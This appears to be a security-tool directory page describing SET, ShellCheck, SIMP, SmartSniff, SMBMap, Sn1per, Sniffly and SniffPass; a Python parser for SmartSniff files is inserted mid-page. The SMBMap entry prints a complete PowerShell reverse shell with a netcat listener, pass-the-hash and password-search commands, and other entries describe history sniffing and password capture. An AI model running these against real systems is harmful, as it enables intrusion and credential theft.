    The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering type environment. TrustedSec believes that social-engineering is one of the hardest attacks to protect against and now one of the most prevalent. The toolkit has been featured in a number of books including the number one best seller in security books for 12 months since its release, “Metasploit: The Penetration Tester’s Guide” written by TrustedSec’s founder as well as Devon Kearns, Jim O’Gorman, and Mati Aharoni.

    The next major revision of The Social-Engineer Toolkit (SET) v6.5 codename “Mr Robot” has just been released. The codename is in celebration of the TV show Mr Robot featuring SET last night! Kudos to them for having some amazing tech writers and appreciate the shoutout on the show.


    This version incorporates a new HTA web attack vector (thanks to Justin Elze aka ginger for sharing the attack vector with me). This attack allows you to clone a website and inject an HTA file which compromises the system.

    Additionally, SET added a lot of the new exploits including the Hacking Team Adobe zero-day, and others from Metasploit.

    Full changelog below:
    ~~~~~~~~~~~~~~~~
    version 6.5
    ~~~~~~~~~~~~~~~~
    * added brand new attack vector HTA attack and incorporated powershell injection into it
    * fixed a prompt that would cause double IP questions in certain attack vectors
    * slimmed down powershell injection http/https attack vectors in order to use in payload delivery
    * added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
    * added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
    * added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)

    Supported platforms
    • Linux
    • Windows (experimental)

    Download SET v6.5 

    ShellCheck - Automatically Detects Problems with sh/bash Scripts and Commands


    ShellCheck is a static analysis and linting tool for sh/bash scripts. It's mainly focused on handling typical beginner and intermediate level syntax errors and pitfalls where the shell just gives a cryptic error message or strange behavior, but it also reports on a few more advanced issues where corner cases can cause delayed failures.

    Haskell source code is available on GitHub!

    Run ShellCheck online

    SIMP - System Integrity Management Platform


    SIMP is a framework that aims to provide a reasonable combination of security compliance and operational flexibility.

    The ultimate goal of the project is to provide a complete management environment focused on compliance with the various profiles in the SCAP Security Guide Project and industry best practice.

    Though it is fully capable out of the box, the intent of SIMP is to be molded to your target environment in such a way that deviations are easily identifiable to both Operations Teams and Security Officers.

    Supported Operating Systems

    The following Operating Systems are supported:
    • Red Hat Enterprise Linux
      • 6.6
      • 7.1
    • CentOS
      • 6.6
      • 7.1-1503-01

    Technology components

    SIMP uses Puppet to manage and maintain the configuration of the various component systems.
    Though there are many possible configurations, out of the box SIMP provides:
    • Management
      • Puppet Server
      • PuppetDB
      • MCollective
    • Authentication
      • OpenLDAP
    • Kickstart/Update
      • YUM
      • DNS
      • DHCP
      • TFTP

    SIMP Provided Materials

    Build Materials

    Puppet Modules

    Forked External Modules

    Most forks are simply to fit the materials into our build processes but some have modifications that we are looking to push back upstream when possible.


    Download SIMP

    SmartSniff v2.16 - Capture TCP/IP packets on your network adapter


    SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as a sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP) or as a hex dump (for non-text-based protocols, like DNS).

    SmartSniff provides 3 methods for capturing TCP/IP packets:
    1. Raw Sockets (Only for Windows 2000/XP or greater): Allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
    2. WinPcap Capture Driver: Allows you to capture TCP/IP packets on all Windows operating systems (Windows 98/ME/NT/2000/XP/2003/Vista). In order to use it, you have to download and install the WinPcap capture driver (WinPcap is a free open-source capture driver).
      This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
    3. Microsoft Network Monitor Driver (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
    4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of the Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic.
      The new version of Microsoft Network Monitor (3.x) is available to download from the Microsoft Web site.

    System Requirements

    SmartSniff can capture TCP/IP packets on any version of the Windows operating system (Windows 98/ME/NT/2000/XP/2003/2008/Vista/7/8) as long as the WinPcap capture driver is installed and works properly with your network adapter.

    You can also use SmartSniff with the capture driver of Microsoft Network Monitor, if it's installed on your system.

    Under Windows 2000/XP (or greater), SmartSniff also allows you to capture TCP/IP packets without installing any capture driver, by using the 'Raw Sockets' method. However, this capture method has some limitations and problems:
    • Outgoing UDP and ICMP packets are not captured.
    • On Windows XP SP1 outgoing packets are not captured at all - thanks to Microsoft's bug that appeared in the SP1 update...
      This bug was fixed in the SP2 update, but under Vista, Microsoft brought back the outgoing packets bug of XP/SP1.
    • On Windows Vista/7/8: Be aware that the Raw Sockets method doesn't work properly on all systems. It's not a bug in SmartSniff, but in the API of the Windows operating system. If you only see the outgoing traffic, try to turn off Windows firewall, or add smsniff.exe to the allowed programs list of Windows firewall.

    Download SmartSniff v2.16

    SmartSniff v2.17 - Capture TCP/IP packets on your network adapter


    SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as a sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP) or as a hex dump (for non-text-based protocols, like DNS).
    SmartSniff provides 3 methods for capturing TCP/IP packets:
    1. Raw Sockets (Only for Windows 2000/XP or greater): Allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
    2. WinPcap Capture Driver: Allows you to capture TCP/IP packets on all Windows operating systems (Windows 98/ME/NT/2000/XP/2003/Vista). In order to use it, you have to download and install the WinPcap capture driver (WinPcap is a free open-source capture driver).
      This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
    3. Microsoft Network Monitor Driver (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
    4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of the Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic.
      The new version of Microsoft Network Monitor (3.x) is available to download from the Microsoft Web site.
      Notice: If WinPcap is installed on your system, and you want to use the Microsoft Network Monitor Driver method, it's recommended to run SmartSniff with /NoCapDriver, because the Microsoft Network Monitor Driver may not work properly when WinPcap is loaded too.

    Using SmartSniff

    In order to start using SmartSniff, simply copy the executable (smsniff.exe) to any folder you like, and run it (installation is not needed).
    After running SmartSniff, select "Start Capture" from the File menu, or simply click the green play button in the toolbar. If it's the first time that you use SmartSniff, you'll be asked to select the capture method and the network adapter that you want to use. If WinPcap is installed on your computer, it's recommended to use this method to capture packets.
    After selecting the capture method and your network adapter, click the 'OK' button to start capturing TCP/IP packets. While capturing packets, try to browse some Web sites, or retrieve new emails from your email software. After stopping the capture (by clicking the red stop button) SmartSniff displays the list of all TCP/IP conversations that it captured. When you select a specific conversation in the upper pane, the lower pane displays the TCP/IP streams of the selected client-server conversation.
    If you want to save the captured packets for viewing them later, use the "Save Packets Data To File" option from the File menu.

    Display Mode

    SmartSniff provides 3 basic modes to display the captured data: Automatic, Ascii, and Hex Dump. In Automatic mode (the default), SmartSniff checks the first bytes of the data stream - if they contain characters lower than 0x20 (excluding CR, LF and tab characters), it displays the data in Hex mode. Otherwise, it displays it in Ascii mode.
    You can easily switch between display modes by selecting them from the menu, or by using the F2 - F4 keys. Be aware that 'Hex Dump' mode is much slower than Ascii mode.
    Starting from version 1.35, there is a new mode - 'URL List'. This mode only displays the list of URL addresses (http://...) found in the captured packets.

    Exporting the captured data

    SmartSniff allows you to easily export the captured data for using it in other applications:
    • The upper pane: you can select one or more items in the upper pane, and then copy them to the clipboard (you can paste the copied items into Excel or into an OpenOffice.org spreadsheet) or save them to a text/HTML/XML file (by using 'Save Packet Summaries').
    • The lower pane: You can select any part of the TCP/IP streams (or select all text, by using Ctrl+A), copy the selected text to the clipboard, and then paste it into Notepad, Wordpad, MS-Word or any other editor. When you paste the selected streams into a Wordpad, OpenOffice.org, or MS-Word document, the colors are also transferred.
      You can also export the TCP/IP streams to a text file, HTML file, or raw data file, by using the "Export TCP/IP Streams" option.

    Capture and Display Filters

    Starting from version 1.10, you can filter unwanted TCP/IP activity during the capture process (Capture Filter), or when displaying the captured TCP/IP data (Display Filter).
    For both filter types, you can add one or more filter strings (separated by spaces or CRLF) in the following syntax:
    [include | exclude] : [local | remote | both] : [tcp | udp | tcpudp | icmp | all] : [IP Range | Ports Range]
    Here's some examples that demonstrate how to create a filter string:
    • Display only packets with remote tcp port 80 (Web sites): 
      include:remote:tcp:80
    • Display only packets with remote tcp port 80 (Web sites) and udp port 53 (DNS): 
      include:remote:tcp:80 
      include:remote:udp:53
    • Display only packets originating from the following IP address range: 192.168.0.1 - 192.168.0.100:
      include:remote:all:192.168.0.1-192.168.0.100
    • Display only TCP and UDP packets that use the following port range: 53 - 139: 
      include:both:tcpudp:53-139
    • Filter most BitTorrent packets (port 6881): 
      exclude:both:tcpudp:6881
    • Filter all ICMP packets (Ping/Traceroute activity): 
      exclude:both:icmp
    Notice: A single filter string must not include spaces !

    Live Mode

    Starting from version 1.10, a new option was added to the 'Advanced Options' section - 'Live Mode'. When SmartSniff captures packets in live mode, the TCP/IP conversations list is updated while capturing the packets, instead of updating it only after the capture is finished. Be aware that "Live Mode" requires more CPU resources than non-live mode. So if your computer is slow, or you have very high traffic on your network, it's recommended to turn off this option.
    Starting from version 1.20, you can also view the content of each TCP/IP conversation (in the lower pane) while capturing the packets. However, if the TCP/IP conversation is too large, you won't be able to watch the entire TCP/IP conversation until the capture is stopped.

    Viewing process information

    Starting from version 1.30, you can view the process information (ProcessID and process filename) for captured TCP packets. However, this feature has some limitations and problems:
    • Process information is only displayed for TCP packets (it doesn't work with UDP).
    • Process information may not be displayed for TCP connections that closed after a short period of time.
    • Retrieving process information consumes more CPU resources and may slow down your computer. It's not recommended to use this feature if you have intensive network traffic.
    • Process information is currently not saved in ssp file.
    In order to activate this feature, go to 'Advanced Options' dialog-box, check the "Retrieve process information while capturing packets" option and click the 'OK' button. 2 new columns will be added: ProcessID and Process Filename. Start capturing, and process information will be displayed for the captured TCP conversations.

    The structure of .ssp file (SmartSniff Packets File)

    The structure of the .ssp file saved by SmartSniff is very simple. It contains one main header at the beginning of the file, followed by a sequence of all TCP/IP packets, each of which begins with a small header.
    The main header structure:
    00 (8 bytes) SMSNF200 signature.
    08 (2 bytes) The number of bytes in the header (currently 4 bytes for the IP address).
    0A (4 bytes) IP address.
    Header of each packet:
    00 (2 bytes) Packet header size (currently 0x18 bytes).
    02 (4 bytes) Number of received bytes in the packet.
    06 (8 bytes) Packet time in Windows FILETIME format.
    0E (6 bytes) Source MAC address.
    14 (6 bytes) Dest. MAC address.
    1A The remaining bytes are the TCP/IP packet itself.
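    The layout above is enough to write a reader for the file; the following is an added example, not SmartSniff code. It assumes little-endian integers (the file is written by a Windows program) and reads each "header size" field as the count of bytes that follow it, which is the reading under which the 0x18-byte packet header puts the packet data at offset 0x1A; the two-packet capture embedded in the code is constructed.

```python
"""Reader for SmartSniff .ssp packet files (added example, not SmartSniff code).

Layout, from the SmartSniff documentation:
  main header:   00 "SMSNF200"  08 u16 header size (4)  0A IPv4 address  -> packets
  packet header: 00 u16 header size (0x18)  02 u32 byte count  06 u64 FILETIME
                 0E src MAC (6)  14 dst MAC (6)  1A packet data
Assumptions: little-endian integers; a size field counts the bytes after itself.
"""
import struct
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List

MAGIC = b"SMSNF200"
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME origin, 100 ns ticks


@dataclass
class SspPacket:
    timestamp: datetime
    src_mac: str
    dst_mac: str
    data: bytes


@dataclass
class SspFile:
    capture_ip: str
    packets: List[SspPacket]


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to a UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ssp(blob: bytes) -> SspFile:
    """Parse a whole .ssp file; raises ValueError on a bad signature or truncation."""
    if blob[:8] != MAGIC:
        raise ValueError("not a SmartSniff .ssp file (signature mismatch)")
    (hdr_len,) = struct.unpack_from("<H", blob, 8)
    if hdr_len < 4 or 10 + hdr_len > len(blob):
        raise ValueError("main header too short or truncated")
    capture_ip = ".".join(str(b) for b in blob[10:14])
    pos = 10 + hdr_len  # honour the size field so a longer future header is skipped
    packets: List[SspPacket] = []
    while pos < len(blob):
        if pos + 2 > len(blob):
            raise ValueError("truncated packet header")
        (phdr_len,) = struct.unpack_from("<H", blob, pos)
        if phdr_len < 24:  # need the byte count, FILETIME and both MACs
            raise ValueError(f"unsupported packet header size {phdr_len:#x} at {pos}")
        data_start = pos + 2 + phdr_len
        if data_start > len(blob):
            raise ValueError("truncated packet header")
        nbytes, ft = struct.unpack_from("<IQ", blob, pos + 2)
        src, dst = blob[pos + 14:pos + 20], blob[pos + 20:pos + 26]
        data = blob[data_start:data_start + nbytes]
        if len(data) != nbytes:
            raise ValueError(f"packet at {pos} claims {nbytes} bytes, file ends early")
        packets.append(SspPacket(filetime_to_datetime(ft), _mac(src), _mac(dst), data))
        pos = data_start + nbytes
    return SspFile(capture_ip, packets)


def build_sample_ssp() -> bytes:
    """Constructed two-packet capture so the reader can be exercised offline."""
    def packet(ft: int, src: str, dst: str, payload: bytes) -> bytes:
        return (struct.pack("<HIQ", 24, len(payload), ft)
                + bytes.fromhex(src) + bytes.fromhex(dst) + payload)
    unix_epoch_ft = 116_444_736_000_000_000  # FILETIME of 1970-01-01 00:00:00 UTC
    head = MAGIC + struct.pack("<H", 4) + bytes([192, 168, 0, 10])
    req = packet(unix_epoch_ft, "001122334455", "66778899aabb", b"GET / HTTP/1.1\r\n")
    rsp = packet(unix_epoch_ft + 10_000_000, "66778899aabb", "001122334455",
                 b"HTTP/1.1 200 OK\r\n")  # one second later
    return head + req + rsp


if __name__ == "__main__":
    for p in parse_ssp(build_sample_ssp()).packets:
        print(p.timestamp.isoformat(), p.src_mac, "->", p.dst_mac, p.data)
```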


    Download SmartSniff v2.17

    SmarTTY - Multi-tabbed SSH Client with SCP Support


    SmarTTY is a free multi-tabbed SSH client that supports copying files and directories with SCP on-the-fly and editing files in-place.

    One SSH session - multiple tabs
    Most SSH servers support up to 10 sub-sessions per connection. SmarTTY makes the best of it: no annoying multiple windows, no need to relogin, just open a new tab and go!

    Transfer files and whole directories
    • Explore remote directory structure with Windows-style GUI
    • Download and upload single files with SCP protocol
    • Transfer entire directories with recursive SCP
    • Quickly send and receive directories with on-the-fly TAR

    Edit files in-place
    Select "File->Open" to open an editor tab for a remote file:
    • Native Windows file editing look & feel
    • Automatic CRLF to LF conversion
    • Option to invoke 'sudo' to save protected files

    Built-in hex terminal for COM ports
    Simply select "Setup new serial or TCP connection" to conveniently communicate with your embedded device:
    • View data in ASCII, HEX or both
    • Save communication logs to files
    • Automatically group data packets based on time of arrival

    Out-of-the-box public-key auth
    SmarTTY can automatically configure public key authentication for selected remote computers:
    • No need to enter your password each time
    • Private key is securely stored in Windows key container
    • One-click configuration of remote host
    • Your Unix password is not stored anywhere

    Run graphical applications seamlessly
    SmarTTY comes with a pre-built XMing X11 server. The server will be configured and started on-the-fly as soon as you launch a graphical application in terminal:
    • Remote X11 apps run out-of-the-box
    • No need to configure anything manually

    SMBMap - Samba Share Enumerator


    SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

    Some of the features have not been thoroughly tested, so changes will be forthcoming as bugs are found. I only really find and fix the bugs while I'm on engagements, so progress is a bit slow. Any feedback or bug reports would be appreciated. It's definitely rough around the edges, but I'm just trying to pack in features at the moment. Version 2.0 should clean up the code a lot... whenever that actually happens ;). Thanks for checking it out! Planned features include a simple remote shell (instead of the god-awful PowerShell script in the examples), actual logging, shadow copying ntds.dit automation (Win7 and up only... for now), threading, and other things.

    Features:
    • Pass-the-Hash Support
    • File upload/download/delete
    • Permission enumeration (writable share, meet Metasploit)
    • Remote Command Execution
    • Distributed file content searching (new!)
    • File name matching (with an auto-download capability)

    Help
    SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
    
    optional arguments:
      -h, --Help            show this help message and exit
    
    Main arguments:
      -H HOST               IP of host
      --host-file FILE      File containing a list of hosts
      -u USERNAME           Username, if omitted null session assumed
      -p PASSWORD           Password or NTLM hash
      -s SHARE              Specify a share (default C$), ex 'C$'
      -d DOMAIN             Domain name (default WORKGROUP)
      -P PORT               SMB port (default 445)
    
    Command Execution:
      Options for executing commands on the specified host
    
      -x COMMAND            Execute a command ex. 'ipconfig /r'
    
    Filesystem Search:
      Options for searching/enumerating the filesystem of the specified host
    
      -L                    List all drives on the specified host
      -R [PATH]             Recursively list dirs, and files (no share\path lists
                            ALL shares), ex. 'C$\Finance'
      -r [PATH]             List contents of directory, default is to list root of
                            all shares, ex. -r 'C$\Documents and
                            Settings\Administrator\Documents'
      -A PATTERN            Define a file name pattern (regex) that auto downloads
                            a file on a match (requires -R or -r), not case
                            sensitive, ex '(web|global).(asax|config)'
      -q                    Disable verbose output (basically only really useful
                            with -A)
    
    File Content Search:
      Options for searching the content of files
    
      -F PATTERN            File content search, -F '[Pp]assword' (requies admin
                            access to execute commands, and powershell on victim
                            host)
      --search-path PATH    Specify drive/path to search (used with -F, default
                            C:\Users), ex 'D:\HR\'
    
    Filesystem interaction:
      Options for interacting with the specified host's filesystem
    
      --download PATH       Download a file from the remote system,
                            ex.'C$\temp\passwords.txt'
      --upload SRC DST      Upload a file to the remote system ex.
                            '/tmp/payload.exe C$\temp\payload.exe'
      --delete PATH TO FILE
                            Delete a remote file, ex. 'C$\temp\msf.exe'
      --skip                Skip delete file confirmation prompt
    
    Examples:
    
    $ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
    $ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
    $ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'
    
    Default Output:
    $  python smbmap.py --host-file smb-hosts.txt -u jsmith -p 'R33nisP!nckl3' -d ABC
    [+] Reading from stdin
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.0.5:445 Name: unkown                                            
            Disk                                                    Permissions
            ----                                                    -----------
            ADMIN$                                                  READ, WRITE
            C$                                                      READ, WRITE
            IPC$                                                    NO ACCESS
            TMPSHARE                                                READ, WRITE
    [+] User SMB session establishd...
    [+] IP: 192.168.2.50:445        Name: unkown                                            
            Disk                                                    Permissions
            ----                                                    -----------
            IPC$                                                    NO ACCESS
            print$                                                  READ, WRITE
            My Dirs                                                 NO ACCESS
            WWWROOT_OLD                                             NO ACCESS
            ADMIN$                                                  READ, WRITE
            C$                                                      READ, WRITE
    
    Command execution:
    $ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.2.50:445        Name: unkown                                            
    Group name     Domain Admins
    Comment        Designated administrators of the domain
    
    Members
    
    -------------------------------------------------------------------------------
    abcadmin                  
    The command completed successfully.
    
    Non recursive path listing (ls):
    $ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 172.16.0.24:445 Name: 172.16.0.24                                       
        Disk                                                    Permissions
        ----                                                    -----------
        C$                                                      READ, WRITE
        .Users                                             
        dw--w--w--                0 Wed Apr 29 13:15:25 2015    .
        dw--w--w--                0 Wed Apr 29 13:15:25 2015    ..
        dr--r--r--                0 Wed Apr 22 14:50:36 2015    Administrator
        dr--r--r--                0 Thu Apr  9 14:46:57 2015    All Users
        dw--w--w--                0 Thu Apr  9 14:46:49 2015    Default
        dr--r--r--                0 Thu Apr  9 14:46:57 2015    Default User
        fr--r--r--              174 Thu Apr  9 14:44:01 2015    desktop.ini
        dw--w--w--                0 Thu Apr  9 14:46:49 2015    Public
        dr--r--r--                0 Wed Apr 22 13:33:01 2015    wingus
    
    File Content Searching:
    $ python smbmap.py -H 192.168.1.203 -u Administrator -p p00p1234! -F password --search-path 'C:\Users\wingus\AppData\Roaming'
    [!] Missing domain...defaulting to WORKGROUP
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.1.203:445 Name: unkown                                            
    [+] File search started on 1 hosts...this could take a while
    [+] Job 861d4cd845124cad95d42175 started on 192.168.1.203, result will be stored at C:\Windows\TEMP\861d4cd845124cad95d42175.txt
    [+] Grabbing search results, be patient, share drives tend to be big...
    [+] Job 1 of 1 completed
    [+] All jobs complete
    Host: 192.168.1.203       Pattern: password
    C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\logins.json
    C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\prefs.js
    
    Drive Listing:
    This feature was added to complement the file content searching feature
    $ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L 
    [!] Missing domain...defaulting to WORKGROUP
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.1.24:445 Name: unkown                                            
    [+] Host 192.168.1.24 Local Drives: C:\ D:\
    [+] Host 192.168.1.24 Net Drive(s):
        E:      \\vboxsrv\Public      VirtualBox Shared Folders
    
    Nifty Shell:
    Run a PowerShell script on the victim SMB host (change the IP in the code to your IP address, i.e. where the shell connects back to)
    $ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 
    [+] Finding open SMB ports....
    [+] User SMB session establishd...
    [+] IP: 192.168.2.50:445        Name: unkown                                            
    [!] Error encountered, sharing violation, unable to retrieve output
    
    Attacker's Netcat Listener:
    $ nc -l 4445
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Windows\system32>whoami
     nt authority\system
    


    Download SMBMap

    Sn1per - Automated Pentest Recon Scanner

    Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.

    Features
    • Automatically collects basic recon (i.e. whois, ping, DNS, etc.)
    • Automatically launches Google hacking queries against a target domain
    • Automatically enumerates open ports
    • Automatically brute forces sub-domains and DNS info
    • Automatically runs targeted nmap scripts against open ports
    • Automatically scans all web applications for common vulnerabilities
    • Automatically brute forces all open services

    Install
    chmod +x install.sh
    ./install.sh
    Installs all dependencies. Best run from Kali Linux.

    Usage
    ./sn1per

    SAMPLE REPORT:
    https://gist.githubusercontent.com/1N3/070d14c364e5f23bfe5e/raw/8e152e740ba50cd49bb3366ec91cf7d08ca02715/Sn1per%2520Sample%2520Report


    Download Sn1per

    Sniffly - Sniffing Browser History Using HSTS + CSP.


    Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.
    More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf .

    Demo
    Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

    How it works
    I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:
    1. User visits Sniffly page
    2. Browser attempts to load images from various HSTS domains over HTTP
    3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
    4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

    Finding HSTS hosts
    To scrape an included list of sites (util/strict-transport-security.txt, courtesy of Scott Helme) to determine which hosts send HSTS headers, do:
    $ cd util
    $ ./run.sh <number_of_batches> > results.log
    
    where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.
    To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:
    $ cd util
    $ ./process.py <results_file> > processed.log
    
    Once that's done, you can copy the hosts from processed.log into src/index.js.

    Running sploitz
    Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the <meta> tag are apparently not supported yet, so you need to set up a local web server to serve the CSP HTTP response header. My Nginx server block looks something like this:
    server {
        listen 8081;
        server_name localhost;
        location / {
            root /path/to/sniffly/src;
            add_header Content-Security-Policy "img-src http:";
            index index.html;
        }
    }
    
    Or in .htaccess:
    <IfModule mod_headers.c>
    Header set Content-Security-Policy "img-src http:"
    </IfModule>
    
    Or send the header via PHP.
    Paste this at the start of the script (and change the name to index.php):
    <?php
        $csp_rules = "img-src http:";
        // Just to ensure maximum compatibility
        header('X-WebKit-CSP: '.$csp_rules);
        header('X-Content-Security-Policy: '.$csp_rules);
        header('Content-Security-Policy: '.$csp_rules);
    ?>

    Caveats
    • Not supported yet in Safari, IE, or Chrome on iOS.
    • Extensions such as HTTPS Everywhere will mess up results.
    • Doesn't work reliably in Tor Browser, since timings are rounded to the nearest 100 milliseconds.
    • Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results.

    Acknowledgements
    • Scott Helme for an initial list of HSTS hosts that he had found so I didn't have to scan the entire Alexa 1M.
    • Chris Palmer for advising on how to file a privacy bug in Chrome.
    • Dan Kaminsky and WhiteOps for sponsoring the ToorCon trip where this was presented.
    • Jan Schaumann and Chris Rohlf for being early testers.
    • Everyone who let me sleep on their couch while I did this over my "vacation break". You know who you are!


    Download Sniffly

    SniffPass - Password Monitoring/Sniffing Software (Web/FTP/Email)


    SniffPass is a small password monitoring utility that listens to your network, captures the passwords that pass through your network adapter, and displays them on the screen instantly. SniffPass can capture the passwords of the following protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords).

    You can use this utility to recover lost Web/FTP/Email passwords.

    Using SniffPass

    In order to start using SniffPass, follow the instructions below:
    1. Download and install the WinPcap capture driver or the Microsoft Network Monitor driver. 
      You can also try to capture without any driver installation, simply by using the 'Raw Socket' capture method, but you should be aware that this method doesn't work properly on many systems.
    2. Run the executable file of SniffPass (SniffPass.exe).
    3. From the File menu, select "Start Capture", or simply click the green play button in the toolbar. If it's the first time that you use SniffPass, you'll be asked to select the capture method and the network adapter that you want to use. 
      After you select the desired capture options, SniffPass listens to your network adapter and instantly displays any password that it finds.
    4. In order to verify that the password sniffing works in your system, go to the demo Web page at http://www.nirsoft.net/password_test and type 'demo' as user name and 'password' as the password. After typing the user name/password and clicking 'Ok', you should see a new line in the main window of SniffPass containing the user/password you typed.

    Get passwords of another computer on your network?

    Many people ask me whether SniffPass is able to get passwords from another computer on the same network. So here's the answer. In order to grab the passwords from other network computers:
    1. You must use a simple hub to connect your computers to the network. All modern switches and routers automatically filter the packets of the other computers, so the computer that runs SniffPass will never "see" the passwords of other computers when you use a switch or a router.
    2. Your network card must be able to enter into 'Promiscuous Mode'.
    3. You must use WinPCap or Network Monitor Driver as a capture method.
    4. For wireless networks: most wireless network cards (or their device drivers) automatically filter the packets of other computers, so you won't be able to capture the passwords of other computers. However, starting from Windows Vista/7, you can capture passwords on wireless networks that are not encrypted by using WiFi Monitor Mode and Network Monitor Driver 3.x.
      For more information about capturing from wireless networks, read this blog post: How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

    Command-Line Options

    Command        Description
